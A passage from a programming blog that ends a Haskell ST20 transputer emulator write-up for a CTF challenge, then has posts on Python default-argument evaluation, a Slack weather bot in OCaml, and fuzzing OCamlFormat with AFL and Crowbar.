interpret (Sec GAJW) = xchg areg wptr
interpret (Sec GCALL) = xchg areg iptr
interpret (Pri ADC n) = areg += n
interpret (Pri EQC n) = areg %= (\ a -> fromBool $ a == n)

For some others, we can lift them into the host language and use Haskell operations.

interpret (Sec PROD) = liftOp (*)
interpret (Sec XOR) = liftOp xor
interpret (Sec AND) = liftOp (.&.)
interpret (Sec BSUB) = liftOp (+)
interpret (Sec SSUB) = liftOp $ \ a b -> a + 2 * b
interpret (Sec WSUB) = liftOp (@@)
interpret (Sec GTx) = liftOp $ \ a b -> fromBool $ b > a
interpret (Sec SHR) = liftOp $ \ a b -> b `shiftR` fromIntegral a
interpret (Sec SHL) = liftOp $ \ a b -> b `shiftL` fromIntegral a
interpret (Sec REM) = liftOp $ \ a b -> b `mod` a
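Since `liftOp` pops A first and B second and then computes `op a b`, operand order matters for non-commutative operations: GT tests B > A, and SHR shifts B by A. A tiny Python model of the integer stack (hypothetical names, with the top of the stack at the end of a list, unbounded like the Haskell list) makes this explicit.

```python
class IntStack:
    """Integer stack with A on top (hypothetical model)."""

    def __init__(self):
        self.items = []

    def push(self, n: int) -> None:
        self.items.append(n)

    def pop(self) -> int:
        return self.items.pop()

    def lift_op(self, op) -> None:
        """Pop A, then B, and push op(a, b), like liftOp."""
        a = self.pop()  # A register
        b = self.pop()  # B register
        self.push(op(a, b))

def gt(a, b):
    return int(b > a)  # GTx: B > A

def shr(a, b):
    return b >> a      # SHR, as in the Haskell code: B shifted right by A
```

In other words, to compute x > y, a program pushes x first and then y, since y ends up in A and x in B.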

Others need a few operations to prepare the operands and access memory.

interpret (Sec SB) = do
  a <- popInt
  b <- popInt
  memByte a .= fromIntegral b
interpret (Sec DUP) = do
  a <- popInt
  pushInt a
  pushInt a
interpret (Pri STL n) = do
  v <- popInt
  var n .= v
interpret (Pri LDLP n) = do
  v <- use wptr
  pushInt $ v @@ n
interpret (Pri LDL n) = do
  v <- use $ var n
  pushInt v
interpret (Sec LDPI) = do
  ip <- use iptr
  areg += ip
interpret (Pri CJ n) = do
  a <- popInt
  let d = if a == 0 then n else 0
  iptr += d
interpret (Sec LB) = do
  a <- use areg
  a' <- fromIntegral <$> use (memByte a)
  areg .= a'
interpret (Pri STNL n) = do
  a <- popInt
  b <- popInt
  memWord (a @@ n) .= b
interpret (Pri LDNL n) = do
  a <- use areg
  a' <- use $ memWord $ a @@ n
  areg .= a'

Call and return instructions use the workspace to pass arguments.

interpret (Pri CALL n) = do
  (a, b, c) <- popAll
  pushWorkspace c
  pushWorkspace b
  pushWorkspace a
  ip <- use iptr
  pushWorkspace ip
  -- The stack is empty after popAll, so push the return address into A
  -- rather than overwriting the head of an empty list.
  pushInt ip
  iptr += n
interpret (Sec RET) = do
  newIp <- popWorkspace
  _ <- popWorkspace
  _ <- popWorkspace
  _ <- popWorkspace
  iptr .= newIp

To perform I/O, the calling transputer needs to supply three things on the integer stack:

the number of bytes to transfer;

a pointer to a channel;

where to read or write the message.

The channel itself is abstracted by the transputer’s channel maps. Most reads succeed; however, the first transputer’s channel 0 reads directly from a file, so it will reach end of file at some point. We can detect that when an empty list is read, and exit the process.

interpret (Sec OUT) = do
  (len, pChan, pMsg) <- popAll
  message <- use $ mem8s pMsg len
  chan <- asks $ getOChan pChan
  writeToOChan chan message
interpret (Sec IN) = do
  (len, pChan, pMsg) <- popAll
  chan <- asks $ getIChan pChan
  input <- readFromIChan chan len
  when (null input) $ liftIO exitSuccess
  mem8s pMsg (fromIntegral $ length input) .= input

The core of the interpreter is then very simple:

evalLoop :: Eval ()
evalLoop = do
  i <- decodeInstr
  interpret i
  evalLoop

Boot from link

Several things are missing: the memory map, and how the system boots.

It turns out that the ST20 has a very simple boot protocol:

read 1 byte from port 0, call it n

read n bytes from port 0

store those at memStart

set the workspace just after this memory chunk

jump to memStart
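The boot protocol above can be sketched in Python against any byte stream, here an `io.BytesIO` standing in for link 0. The function name `boot_from_link` and the returned dictionary are hypothetical; `MEM_START` uses the same value as `memStart` in the emulator, and, like the Haskell code, the workspace pointer is set to the first address after the loaded code.

```python
import io

MEM_START = 0x80000100  # same value as memStart in the emulator

def boot_from_link(link) -> dict:
    """Load a boot image from a binary stream (hypothetical helper).

    Reads one length byte n, then n bytes of code, stores them at MEM_START
    and returns the initial memory and registers.
    """
    header = link.read(1)
    if len(header) != 1:
        raise EOFError("no boot length byte")
    n = header[0]
    code = link.read(n)
    if len(code) != n:
        raise EOFError("truncated boot image")
    mem = {MEM_START + i: b for i, b in enumerate(code)}
    return {"mem": mem, "iptr": MEM_START, "wptr": MEM_START + n}

# Example: a 3-byte program followed by unrelated data, which stays unread.
example = boot_from_link(io.BytesIO(bytes([3, 0x24, 0xF2, 0x45, 0x99])))
```

Only the announced number of bytes is consumed, so whatever follows on the link is left for the program itself to read.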

bootSeq :: Eval ()
bootSeq = do
  chan <- asks $ getIChan $ iPin 0
  len <- head <$> readFromIChan chan 1
  prog <- readFromIChan chan $ fromIntegral len
  mem8s memStart (fromIntegral $ length prog) .= prog
  wptr .= memStart + fromIntegral len

There’s some flexibility on memStart, but this value works:

memStart :: Address
memStart = 0x80000100

Pin numbers, however, are mapped to fixed addresses:

iPin :: Int32 -> Int32
iPin n = 0x80000010 @@ n

oPin :: Int32 -> Int32
oPin n = 0x80000000 @@ n

We decide to initialize the memory with zeroes:

initialMem :: Mem
initialMem = M.fromList $ zip [0x80000000 .. memEnd] $ repeat 0
  where
    memSize = 0x4000
    memEnd = memStart + memSize - 1

Booting a transputer is then just a matter of reading from the correct channel and running the evaluation loop.

transputer :: Maybe Analysis
           -> [((Int32, IChannel), (Int32, OChannel))]
           -> IO (MVar ())
transputer analysis cmap = do
  let (imap, omap) = unzip cmap
  fork $ runEval initialMem imap omap $ do
    bootSeq
    runAnalysis analysis
    evalLoop

Multithreading boilerplate

If you fork threads and don’t wait for them, nothing will happen, since the program exits as soon as the main thread does. The solution is to create a “control” MVar for each thread, which that thread signals when it finishes:

fork :: IO () -> IO (MVar ())
fork io = do
  mvar <- newEmptyMVar
  _ <- forkFinally io $ \ _ -> putMVar mvar ()
  return mvar

And to wait for all of them:

runAll :: [IO (MVar ())] -> IO ()
runAll ms = do
  threads <- sequence ms
  mapM_ takeMVar threads

Connecting the lines

For this problem we have 13 transputers.

data TransputerName
  = T00 | T01 | T02 | T03 | T04 | T05 | T06
  | T07 | T08 | T09 | T10 | T11 | T12
  deriving (Enum, Eq)

We devise a way to connect them together. The communication between two transputers is bidirectional, so we need two channels. Each of them is converted to an OChannel on one side and an IChannel on the other one.
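The same wiring can be sketched in Python, with `queue.Queue` playing the role of `Chan`. As in `connect`, a link is two one-way queues, and each end gets one to write to and the other to read from. The function name and the tuple layout mirror the Haskell code; they are not a library API.

```python
import queue

def connect(src, src_port, dst, dst_port):
    """Create a bidirectional link as two one-way queues.

    Returns one (name, port, out_queue, in_queue) entry per endpoint.
    """
    x = queue.Queue()  # carries bytes from src to dst
    y = queue.Queue()  # carries bytes from dst to src
    return [(src, src_port, x, y), (dst, dst_port, y, x)]
```

Each transputer thread then only ever writes to its own out queue and reads from its own in queue; `queue.Queue` is thread-safe, so no extra locking is needed.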

connect :: TransputerName -> Int32 -> TransputerName -> Int32
        -> IO [(TransputerName, Int32, OChannel, IChannel)]
connect src srcPort dst dstPort = do
  x <- newChan
  y <- newChan
  return [ (src, srcPort, OutChan x, InChan y)
         , (dst, dstPort, OutChan y, InChan x)
         ]

Booting them is a matter of creating the correct communication channels (this pinout list comes from a schematic that was present in the challenge files).

main :: IO ()
main = do
  pins <- concat <$> sequence
    [ connect T00 1 T01 0
    , connect T00 2 T02 0
    , connect T00 3 T03 0
    , connect T01 1 T04 0
    , connect T01 2 T05 0
    , connect T01 3 T06 0
    , connect T02 1 T07 0
    , connect T02 2 T08 0
    , connect T02 3 T09 0
    , connect T03 1 T10 0
    , connect T03 2 T11 0
    , connect T03 3 T12 0
    , connect T11 1 T12 1
    ]
  runAll $ map (buildTransputer pins) [T00 ..]
  where
    buildTransputer pins t =
      transputer (isDebug t) $ onlyFor t pins ++ extraPins t
    pin n ochan ichan = ((iPin n, ichan), (oPin n, ochan))
    onlyFor src l = [pin p oc ic | (name, p, oc, ic) <- l, name == src]
    extraPins T00 = [((iPin 0, InHandle stdin), (oPin 0, OutHandle stdout))]
    extraPins _ = []

Bonus: static analysis tools

The above transputer function is controlled by the following configuration:

data Analysis = Graph | Disasm

isDebug :: TransputerName -> Maybe Analysis
isDebug _ = Nothing

It means that for each transputer, we can choose to print a graph or a disassembly of the code that will be executed. To do that, we will first compute the set of all edges in the control flow graph.

This analysis relies on a nextInstrs function that statically computes the set of next instructions. These can be reached either because they come next in the instruction flow (DSeq), because of a jump (DJmp), or through an unknown destination, for example after a RET (DDyn).

data Dest = DSeq Address
          | DJmp Address
          | DDyn
  deriving (Eq, Ord)

nextInstrs :: Instr -> [Dest]
nextInstrs (Pri CJ n) = [DSeq 0, DJmp n]
nextInstrs (Pri J n) = [DJmp n]
nextInstrs (Pri CALL n) = [DSeq 0, DJmp n]
nextInstrs (Sec GCALL) = [DDyn]
nextInstrs (Sec RET) = [DDyn]
nextInstrs _ = [DSeq 0]

We can wrap this function in a monadic one that turns these relative addresses into absolute ones (since it runs in Eval, it knows the address right after the decoded instruction).

type EdgeSet = S.Set (Address, Instr, Dest)

instrDests :: Address -> Eval EdgeSet
instrDests start = do
  iptr .= start
  i <- decodeInstr
  let deltaips = nextInstrs i
  new <- use iptr
  return $ S.fromList $ map (\ d -> (start, i, adjust new d)) deltaips
  where
    adjust n (DSeq d) = DSeq $ n + d
    adjust n (DJmp d) = DJmp $ n + d
    adjust _ DDyn = DDyn

Then, the algorithm consists of computing the fixpoint of the following iteration function:

step :: EdgeSet -> Eval EdgeSet
step s = do
  xs <- mapM (basicBlockM . getDest) $ S.toList s
  return $ S.union s $ S.unions xs
  where
    getDest (_, _, DSeq a) = Just a
    getDest (_, _, DJmp a) = Just a
    getDest (_, _, DDyn) = Nothing
    basicBlockM (Just a) = instrDests a
    basicBlockM Nothing = return S.empty

The fixpoint itself is computed using the following function, which takes a predicate on two EdgeSets to stop the iteration.

stepUntil :: ((EdgeSet, EdgeSet) -> Bool) -> (EdgeSet, EdgeSet) -> Eval EdgeSet
stepUntil p (a, b) | p (a, b) = return b
stepUntil p (_, b) = do
  c <- step b
  stepUntil p (b, c)

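We’ll stop when two successive sets have the same size. Since step only ever adds edges, equal sizes mean that the sets are equal, so the fixpoint has been reached.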
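Stripped of the emulator plumbing, the analysis is a naive fixpoint iteration: keep decoding every known destination and adding the resulting edges until the set stops growing. Here is a Python sketch over a toy program given as a dictionary from address to (instruction, successors); the `program` format and the function names are hypothetical, and `None` stands for a dynamic destination like `DDyn`.

```python
def instr_edges(program, addr):
    """Edges leaving the instruction at addr, as (addr, instr, dest)."""
    instr, dests = program[addr]
    return {(addr, instr, d) for d in dests}

def step(program, edges):
    """One iteration: decode every known static destination."""
    new = set(edges)
    for (_, _, dest) in edges:
        if dest is not None:  # dynamic destinations cannot be followed
            new |= instr_edges(program, dest)
    return new

def reachable_edges(program, start):
    """Iterate step until two successive edge sets have the same size."""
    prev, cur = set(), instr_edges(program, start)
    while len(prev) != len(cur):
        prev, cur = cur, step(program, cur)
    return cur

# Toy program: one-byte instructions, a conditional jump and a loop back.
program = {
    0: ("LDC 0", [1]),
    1: ("CJ 2", [2, 4]),
    2: ("LDC 1", [3]),
    3: ("RET", [None]),
    4: ("J -5", [0]),
    5: ("LDC 9", [6]),  # never reached from address 0
    6: ("RET", [None]),
}
```

Here `reachable_edges(program, 0)` returns six edges covering addresses 0 to 4; the instructions at 5 and 6 are never decoded, just as unreachable code is left out of the disassembly.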

runAnalysis :: Maybe Analysis -> Eval ()
runAnalysis Nothing = return ()
runAnalysis (Just analysis) = do
  s0 <- instrDests memStart
  let p (a, b) = S.size a == S.size b
  r <- stepUntil p (S.empty, s0)
  liftIO $ putStrLn $ convert analysis r
  iptr .= memStart

Finally, here is how to convert the EdgeSets into a human-readable form.

convert :: Analysis -> EdgeSet -> String
convert Graph es =
  "digraph G{\n" ++
  "node[shape=point]\n" ++
  concatMap edge (S.toList es) ++
  "}"
  where
    edge (x, i, y) =
      show x ++ " -> " ++ toNode x y ++ "[label=\"" ++ show i ++ "\"];\n"
    toNode _ (DSeq a) = show a
    toNode _ (DJmp a) = show a
    toNode x DDyn = "dyn" ++ show x
convert Disasm es = concatMap go $ S.toList es
  where
    go (x, i, DSeq _) = printf "%04x %s\n" x (show i)
    go (x, i, DJmp y) = printf "%04x %s [* %04x]\n" x (show i) y
    go (x, i, DDyn) = printf "%04x %s [* dyn]\n" x (show i)

For example, here is an extract from the beginning of the first transputer’s code. Notice that instructions with several destinations (conditional jumps) are displayed twice.

80000100 AJW -76
80000102 LDC 0
80000103 STL 1
80000104 LDC 0
80000105 STL 3
80000106 MINT
80000108 LDNLP 1024
8000010b GAJW
8000010d AJW -76
8000010f LDC 201
80000111 LDPI
80000113 MINT
80000115 LDC 8
80000116 OUT
80000117 LDLP 73
80000119 MINT
8000011b LDNLP 4
8000011c LDC 12
8000011d IN
8000011e LDL 73
80000120 CJ 21
80000120 CJ 21 [* 80000137]
80000122 LDC 205
80000124 LDPI

For the graph output, I assume that you have already seen graphviz output.

The introduction image was made using the same output but an alternative layout engine.

Hope you enjoyed this article!

In Python, default values are evaluated at import time

Etienne Millon — Tue, 12 Jan 2016 00:00:00 UT

This is a minimal example reproducing a bug I found in html2text. Suppose we have a configuration module, a library that uses the configuration, and a main program.

# config.py
default = False

# lib.py
import config

def f(x=config.default):
    print(x)

# main.py
import config
import lib

config.default = True
lib.f()

The main function sets the configuration, then calls f. One would expect that the program prints True… but it actually prints False.

This behavior can be surprising, but it is perfectly logical once you know the rule:

In Python, default values are evaluated at import time.

This is all there is to know about this problem. Here is what happens at runtime in the above example:

The main program first imports config. The definition of default is evaluated and its value is False.

lib is imported, and the definition of lib.f is evaluated. The value of this function includes the default value for x, so the expression giving this default value, config.default, is evaluated too, and its value is False.

When the value True is assigned to config.default, it is too late: the value False is already part of the function’s value.

That last part is not just a metaphor; the default value is actually stored in the function object:

>>> def f(x=3):
...     print(x)
...
>>> f.__defaults__
(3,)

To avoid this pitfall, the usual solution is to use None as the default value and to look up the actual value inside the function:

def f(x=None):
    if x is None:
        x = config.default
    print(x)

That way, config.default is evaluated each time f is called, which is what we want here. With this version, the program above does print True.
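Both behaviours fit in a single file if a module object stands in for config.py. This sketch uses types.ModuleType for that (an illustration device, not part of the original example), and the functions return x instead of printing it so the two versions can be compared side by side:

```python
import types

# Stand-in for config.py: a module object we can mutate, like main.py does.
config = types.ModuleType("config")
config.default = False


def f_captured(x=config.default):
    # The default expression ran once, when this `def` statement executed.
    return x


def f_lookup(x=None):
    # The None idiom: config.default is read on every call.
    if x is None:
        x = config.default
    return x


config.default = True  # what main.py does after the imports

print(f_captured())             # False
print(f_lookup())               # True
print(f_captured.__defaults__)  # (False,)
```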

NaBoMaMo 2016 writeup

Etienne Millon — Wed, 01 Feb 2017 00:00:00 UT

Hello! It’s 2016, it’s November, and apparently that rhymes with #NaBoMaMo 2016, the National Bot Making Month. I made a bot!

Full disclosure: it’s actually 2017, but I started writing this in 2016, so it’s OK. Also, I’m not actually from the US, but let’s relax the definition a bit and pretend it means International Bot Making Year. Close enough!

Bots are all the rage: Twitter bots, IRC bots, Telegram bots… I decided to make a Slack bot to get more familiar with that API.

I wanted this to be a small project: write and forget, basically. I started by defining some specs and locking them down:

the bot works on Slack

it uses the “will it rain in the next hour” API from Météo France.

the bot understands 3 commands:

tell you whether it will rain or not.

show you a graph of rain level over the next hour.

tell you when to go out to avoid the rain.

The next step was choosing the tech stack. For hosting, I was already sold on Heroku from previous projects (or any other PaaS host, for what it’s worth).

As for the programming language itself, I hesitated between three choices:

focus on the all-included experience: something with libraries and tooling, but somewhat boring;

focus on the shipping experience: something I use daily, with the goal of getting something online quickly;

focus on learning something new.

The first one means something like Python or Ruby. I am familiar with both languages and am pretty sure that there are libraries that can take care of the Slack API without me ever having to worry about HTTP endpoints. It also means first-class deployment and hosting.

The second one means OCaml: it’s a programming language I use daily at work, so the real goal would be to focus on shipping: create a project, write tests, write the implementation, deploy, repeat for new features, forget.

The third one means a totally new programming language. I had heard a lot of good things about Elixir for backend applications and figured that this would be a good intro project. Learning a new language is always an interesting experience, because it makes you a better programmer in all languages, and having clear specs would make this manageable.

The Python/Ruby solution seemed a bit boring. I probably would not learn much; at most, I would add a couple of libraries to my toolbelt.

Elixir sounds great, but learning a new language while starting a new project is too hard and too time-consuming. I would rather rewrite, in a new language, something I previously wrote in another one. That said, for something small and focused like this, it could have worked. In the end, I went with OCaml.

I first created the project structure: GitHub repo, OCaml project (topkg, opam, etc.). I like to use TDD for this kind of project, so I added a small alcotest suite. I also set up the 12-factor separation: a Procfile, and a small program in bin/ that reads the application configuration from the environment and starts a bot from lib/.
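The 12-factor split boils down to this: the entry point reads its settings from environment variables and hands them to the library. Here is a Python sketch of the idea. PORT is the variable Heroku sets for web processes, while SLACK_TOKEN, Config and load_config are hypothetical names, not the bot's actual configuration. Taking the environment as a parameter keeps the function testable without touching the real process environment.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Config:
    port: int
    slack_token: str


def load_config(env):
    """Build the bot configuration from a mapping of environment variables.

    In production this would be called as load_config(os.environ).
    """
    return Config(
        port=int(env.get("PORT", "8080")),  # hypothetical local default
        slack_token=env["SLACK_TOKEN"],     # required: fail loudly if missing
    )
```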

I asked myself what to test. The cohttp library is nice because servers and clients are built from normal functions that take a request and return a response. That makes it possible to test almost everything at the OCaml level without going down to the HTTP level. This is especially important since there is no way to mock values and functions in OCaml: everything has to be a real value.

However, even though it was possible to test everything, I decided to focus on the domain logic and not test the HTTP part: for example, I would pass data structures directly to my bot object rather than building a cohttp request.
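Keeping the domain logic separate from HTTP means the three commands can be plain functions over forecast data. A Python sketch, assuming (hypothetically; this is not the Météo France format) that the forecast is a list of integer rain levels, one per 5-minute slot, where 0 means dry:

```python
SLOT_MINUTES = 5  # assumption: one forecast value every 5 minutes


def will_rain(levels):
    """Command 1: is rain forecast at any point in the next hour?"""
    return any(level > 0 for level in levels)


def rain_graph(levels):
    """Command 2: a crude text graph, one bar per slot."""
    return "\n".join(
        f"+{i * SLOT_MINUTES:02d}min {'#' * level}" for i, level in enumerate(levels)
    )


def when_to_go_out(levels):
    """Command 3: minutes until the first dry slot, or None if it rains all hour."""
    for i, level in enumerate(levels):
        if level == 0:
            return i * SLOT_MINUTES
    return None


print(will_rain([0, 0, 2, 1]))       # True
print(when_to_go_out([2, 1, 0, 3]))  # 10
```

Tests for these functions only need lists of integers, not HTTP requests.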

Something that is important to me, even for a small project like this one, is having some sort of CI: Travis runs my test suite and builds a binary ready to be deployed to Heroku. That way, it is impossible to forget how to make changes, test, and deploy, since it is all in a script.

The other part that needed work was the actual Slack integration. The “slash” command API is pretty simple: a Slack team can be configured so that typing /rain hits a particular URL. Some options are passed as POST data, and whatever the endpoint returns is displayed in Slack.

I set up the Slack integration, wrote a function to distinguish between /rain and /rain list (using the POST data), and by the end of the second iteration I had my second feature implemented, working, and deployed.
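Slack sends a slash command as a form-encoded POST body whose command field holds the command name (here /rain) and whose text field holds the rest of the line. Here is a Python sketch of the /rain versus /rain list distinction using the standard urllib.parse.parse_qs. The returned handler keys ("rain-forecast", "rain-list") are hypothetical placeholders, not the bot's real handlers.

```python
from urllib.parse import parse_qs


def parse_slash_command(body):
    """Extract the command name and its argument text from a Slack POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    command = fields.get("command", [""])[0]
    text = fields.get("text", [""])[0].strip()
    return command, text


def dispatch(body):
    """Pick a (hypothetical) handler based on the slash command text."""
    command, text = parse_slash_command(body)
    if command != "/rain":
        return "unknown-command"
    if text == "":
        return "rain-forecast"
    if text == "list":
        return "rain-list"
    return "unknown-subcommand"


print(dispatch("command=%2Frain&text=list"))  # rain-list
```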

All in all, that was pretty great. Neither the code nor the bot itself is particularly fantastic, but I learned some important lessons:

When you do not want to spend a lot of time on a task, invest in planning and keep the list of features short. That is pretty obvious in the context of paid work, but it applies well to hobby programming too.

Know what to test and what not to. Tests are useful to ensure that changes can be made without breaking everything, but testing that your HTTP library can parse POST data is a waste of time.

In languages where it is not possible to mock or monkey patch functions, dependency injection is still possible. One may even argue that it leads to a better solution, since it removes the coupling between the different components.
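The dependency injection idea is language-agnostic: the bot receives the function that fetches the forecast instead of calling the API itself, so a test can hand it canned data without any mocking facility. A Python sketch (Python could monkey-patch, but the design does not rely on it). RainBot and fetch_levels are hypothetical names.

```python
from typing import Callable, List


class RainBot:
    """Bot whose forecast source is injected rather than hard-wired."""

    def __init__(self, fetch_levels: Callable[[], List[int]]):
        # fetch_levels: any function returning the rain levels for the next hour.
        self.fetch_levels = fetch_levels

    def answer(self) -> str:
        levels = self.fetch_levels()
        if any(level > 0 for level in levels):
            return "Rain expected in the next hour"
        return "No rain expected in the next hour"


# Production code would pass a function calling the real API;
# a test just passes a function returning canned data.
dry_bot = RainBot(lambda: [0, 0, 0])
wet_bot = RainBot(lambda: [0, 2, 1])
print(dry_bot.answer())
print(wet_bot.answer())
```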

You can find the source of this bot on GitHub. See you next year, #NaBoMaMo! And thanks to Tully Hansen for organizing this.

Fuzzing OCamlFormat with AFL and Crowbar

Etienne Millon — Mon, 03 Aug 2020 00:00:00 UT

This article was first published on the Tarides blog.

AFL (and fuzzing in general) is often used to find bugs in low-level code like parsers, but it also works very well to find bugs in high-level code, given the right ingredients. We applied this technique to feed random programs to OCamlFormat and found many formatting bugs.

OCamlFormat is a tool to format source code. To do so, it parses the source code to an Abstract Syntax Tree (AST) and then applies formatting rules to the AST.

It can be tricky to correctly format the output. For example, say we want to format (a+b)*c. The corresponding AST will look like Apply("*", Apply ("+", Var "a", Var "b"), Var "c"). A naive formatter would look like this:

let rec format = function
  | Var s -> s
  | Apply (op, e1, e2) ->
      Printf.sprintf "%s %s %s" (format e1) op (format e2)

But this is not correct, as it will print (a+b)*c as a + b * c, which is a different program. In this particular case, the usual solution is to track the relative precedence of the operators and to emit only the necessary parentheses.
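The precedence-tracking fix can be sketched in Python on a tuple encoding of the same toy AST. This illustrates the general technique and is not OCamlFormat's code. The tuple encoding, the PRECEDENCE table and the function names are assumptions of the sketch.

```python
# Toy AST: ("var", name) or ("apply", op, left, right).
PRECEDENCE = {"+": 1, "-": 1, "*": 2}


def naive_format(expr):
    """Port of the naive OCaml formatter: never adds parentheses."""
    if expr[0] == "var":
        return expr[1]
    _, op, e1, e2 = expr
    return f"{naive_format(e1)} {op} {naive_format(e2)}"


def format_expr(expr, parent_prec=0, is_right=False):
    """Add parentheses only where the parser would otherwise regroup.

    All operators here are left-associative, so a right operand with the
    same precedence as its parent also needs parentheses.
    """
    if expr[0] == "var":
        return expr[1]
    _, op, e1, e2 = expr
    prec = PRECEDENCE[op]
    text = f"{format_expr(e1, prec)} {op} {format_expr(e2, prec, is_right=True)}"
    if prec < parent_prec or (is_right and prec == parent_prec):
        return f"({text})"
    return text


example = ("apply", "*", ("apply", "+", ("var", "a"), ("var", "b")), ("var", "c"))
print(naive_format(example))  # a + b * c  (a different program)
print(format_expr(example))   # (a + b) * c
```

The is_right case matters for AST preservation: a - (b - c) must keep its parentheses, and so must a + (b + c), even though the latter has the same value.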

OCamlFormat has similar cases. To make sure we do not change a program when formatting it, there is an extra check at the end to parse the output and compare the output AST with the input AST. This ensures that, in case of bugs, OCamlFormat exits with an error rather than changing the meaning of the input program.

When we consider the whole OCaml language, the rules are complex and it is difficult to make sure that we are correctly handling all programs. There are two main failure modes: either we put too many parentheses, and the program does not look good, or we do not put enough, and the AST changes (and OCamlFormat exits with an error). We need a way to make sure that the latter does not happen. Tests work to some extent, but some edge cases happen only when a certain combination of language features is used. Because of this combinatorial explosion, it is impossible to get good coverage using tests only.

Fortunately there is a technique we can use to automatically explore the program space: fuzzing. For a primer on using this technique on OCaml programs, one can refer to this article.

To make this work we need two elements: a random program generator, and a property to check. Here, we are interested in programs that are valid (in the sense that they parse correctly) but do not format correctly. We can use the OCamlFormat internals to do the following:

try to parse input: in case of a parse error, just reject this input as invalid.

otherwise, we have a valid program. Try to format it. If this succeeds with no error at all, reject this input as well.

otherwise, it means that the AST changed, comments moved, or something similar, in a valid program. This is what we are after.
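The three-step property, including the parse-the-output-and-compare check described earlier, can be sketched with Python's own ast module playing the role of the OCaml parser. classify and the two formatters below are hypothetical. ast.dump ignores source positions by default, so only structural changes count as bugs.

```python
import ast


def classify(source, formatter):
    """Return "invalid", "ok" or "bug" for one fuzzer input."""
    try:
        before = ast.parse(source)
    except SyntaxError:
        return "invalid"  # step 1: not a valid program, reject the input
    formatted = formatter(source)
    try:
        after = ast.parse(formatted)
    except SyntaxError:
        return "bug"      # the formatter produced unparsable output
    if ast.dump(before) == ast.dump(after):
        return "ok"       # step 2: formatted without changes, reject the input
    return "bug"          # step 3: the AST changed, this is what we are after


def strip_parens(source):
    """Deliberately buggy formatter that drops every parenthesis."""
    return source.replace("(", "").replace(")", "")


def reprint(source):
    """Correct formatter: reparse and unparse (needs Python 3.9+)."""
    return ast.unparse(ast.parse(source))


print(classify("x = (a + b) * c", strip_parens))  # bug
print(classify("x = (a + b) * c", reprint))       # ok
print(classify("x = (", reprint))                 # invalid
```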

Generating random programs is a bit more difficult. We could let AFL mutate random strings, but even with a corpus of existing valid code it would generate many invalid programs. We are not interested in these for this project; we would rather start from valid programs.

A good way to do that is to use Crowbar to directly generate AST values. Thanks to ppx_deriving_crowbar and ppx_import, it is possible to generate random values for an external type like Parsetree.structure (the contents of .ml files). Even more fortunately, somebody had already done the work. Thanks, Mindy!

This approach works really well: it generates 5k-10k programs per second, which is very good performance (AFL starts complaining below 100/s).
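The idea of generating AST values instead of text can be imitated in a few lines of Python: build random expression trees directly, print them, reparse, and compare. This sketch replaces Crowbar and AFL with Python's random module, and the buggy formatter is a printer that never emits parentheses. gen_expr, naive_format and fuzz are illustrative names. Every generated input is valid by construction, so every reported failure is a real formatting bug.

```python
import ast
import random

SYMBOLS = {ast.Add: "+", ast.Sub: "-", ast.Mult: "*"}


def gen_expr(rng, depth):
    """Build a random expression AST directly, so it is always valid."""
    if depth == 0 or rng.random() < 0.3:
        return ast.Name(id=rng.choice("abc"), ctx=ast.Load())
    op_cls = rng.choice(list(SYMBOLS))
    return ast.BinOp(
        left=gen_expr(rng, depth - 1), op=op_cls(), right=gen_expr(rng, depth - 1)
    )


def naive_format(node):
    """Deliberately buggy printer: never emits parentheses."""
    if isinstance(node, ast.Name):
        return node.id
    symbol = SYMBOLS[type(node.op)]
    return f"{naive_format(node.left)} {symbol} {naive_format(node.right)}"


def fuzz(trials, seed=0):
    """Return the printed form of every tree whose AST changed on reparse."""
    rng = random.Random(seed)
    failures = []
    for _ in range(trials):
        tree = gen_expr(rng, depth=3)
        text = naive_format(tree)
        reparsed = ast.parse(text, mode="eval").body
        if ast.dump(reparsed) != ast.dump(tree):
            failures.append(text)
    return failures


for text in fuzz(200)[:5]:
    print(text)
```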

AFL quickly found crashes related to attributes. These are “labels” attached to various nodes of the AST. For example, the expression (x || y) [@a] (logical or between x and y, with attribute a attached to the “or” expression) would get formatted as x || y [@a] (attribute a attached to the variable y). Once again, OCamlFormat has a check in place so that it does not save the file in this case, but it would exit with an error.

After the fuzzer had run for a bit longer, it found crashes where comments would jump around in expressions like f (*a*) (*bb*) x. Wait, what? We never told the program generator how to generate comments. Inspecting the intermediate AST reveals that the part in the middle is actually an integer literal with value "(*a*) (*bb*)" (integer literals are represented as strings so that a third-party library could add literals for arbitrary-precision numbers, for example).

AFL comes with a program called afl-tmin that is used to minimize a crash. It will try to find a smaller example of a program that crashes OCamlFormat. It works well even with Crowbar in between. For example it is able to turn (new aaaaaa & [0;0;0;0])[@aaaaaaaaaa] into (0&0)[@a] (neither AFL nor OCamlFormat knows about types, so they can operate on nonsensical programs. Finding a well-typed version of a crash is usually not very difficult, but it has to be done manually).
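afl-tmin works on the raw input bytes. When inputs are trees, a similar effect can be sketched with a greedy tree-level shrinker: repeatedly replace a node with one of its children as long as the failure persists. This is a different, simplified technique shown for illustration only. It reuses Python's ast module and a parenthesis-free printer as the "crashing" formatter, and all names are hypothetical.

```python
import ast

SYMBOLS = {ast.Add: "+", ast.Sub: "-", ast.Mult: "*"}


def naive_format(node):
    """Buggy printer that never emits parentheses."""
    if isinstance(node, ast.Name):
        return node.id
    symbol = SYMBOLS[type(node.op)]
    return f"{naive_format(node.left)} {symbol} {naive_format(node.right)}"


def fails(tree):
    """Our 'crash': printing then reparsing changes the AST."""
    reparsed = ast.parse(naive_format(tree), mode="eval").body
    return ast.dump(reparsed) != ast.dump(tree)


def smaller_candidates(node):
    """Trees obtained by replacing one BinOp node with one of its children."""
    if isinstance(node, ast.BinOp):
        yield node.left
        yield node.right
        for left in smaller_candidates(node.left):
            yield ast.BinOp(left=left, op=node.op, right=node.right)
        for right in smaller_candidates(node.right):
            yield ast.BinOp(left=node.left, op=node.op, right=right)


def minimize(tree):
    """Greedy shrinking: keep any strictly smaller tree that still fails."""
    assert fails(tree)
    changed = True
    while changed:
        changed = False
        for candidate in smaller_candidates(tree):
            if fails(candidate):
                tree, changed = candidate, True
                break
    return tree


start = ast.parse("(a * b) * (c - (a + b))", mode="eval").body
print(ast.unparse(minimize(start)))  # c - (a + b)  (Python 3.9+)
```

Each accepted candidate has fewer nodes than the previous tree, so the loop always terminates.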

In total, letting AFL run overnight on a single core (which is relatively short in terms of fuzzing) uncovered 453 crashes. After minimization and deduplication, these corresponded to about 30 unique issues.

